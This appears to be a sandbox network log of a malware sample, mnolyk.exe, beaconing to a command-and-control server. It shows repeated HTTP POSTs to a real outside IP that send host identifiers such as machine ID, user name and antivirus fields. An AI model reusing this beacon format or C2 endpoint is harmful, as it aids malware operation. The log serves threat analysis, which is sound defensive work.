Feb 7, 2023 20:04:05.800420046 CET	857	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
703	192.168.2.6	50428	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:05.975694895 CET	858	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:06.039757967 CET	858	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
704	192.168.2.6	50429	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:06.205612898 CET	859	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:06.270401001 CET	859	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
705	192.168.2.6	50430	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:06.494424105 CET	860	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:06.559781075 CET	860	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
706	192.168.2.6	50431	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:06.742108107 CET	861	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:06.807320118 CET	861	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
707	192.168.2.6	50432	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:06.987942934 CET	862	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:07.053987026 CET	862	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
708	192.168.2.6	50433	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:07.254487991 CET	863	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:07.319380045 CET	863	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
709	192.168.2.6	50434	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:07.488023043 CET	864	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:07.553051949 CET	864	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.6	49791	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:10.547143936 CET	191	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:10.610843897 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
710	192.168.2.6	50435	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:07.721879005 CET	865	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:07.789803028 CET	865	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
711	192.168.2.6	50436	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:07.968971014 CET	866	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:08.034284115 CET	866	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
712	192.168.2.6	50437	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:08.206569910 CET	867	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:08.270641088 CET	867	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
713	192.168.2.6	50438	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:08.447685957 CET	868	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:08.512579918 CET	868	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
714	192.168.2.6	50439	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:08.690442085 CET	869	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:08.754954100 CET	869	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
715	192.168.2.6	50440	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:08.934140921 CET	870	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:08.998528004 CET	870	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
716	192.168.2.6	50441	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:09.174122095 CET	871	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:09.238481045 CET	871	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
717	192.168.2.6	50442	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:09.409560919 CET	872	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:09.472440004 CET	872	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
718	192.168.2.6	50443	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:09.644629955 CET	873	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:09.708007097 CET	873	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
719	192.168.2.6	50444	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:09.894977093 CET	874	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:09.958677053 CET	874	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.6	49792	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:10.777921915 CET	192	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:10.841155052 CET	192	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
720	192.168.2.6	50445	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:10.137177944 CET	875	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:10.205051899 CET	875	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
721	192.168.2.6	50446	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:10.384849072 CET	876	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:10.448929071 CET	876	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
722	192.168.2.6	50447	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
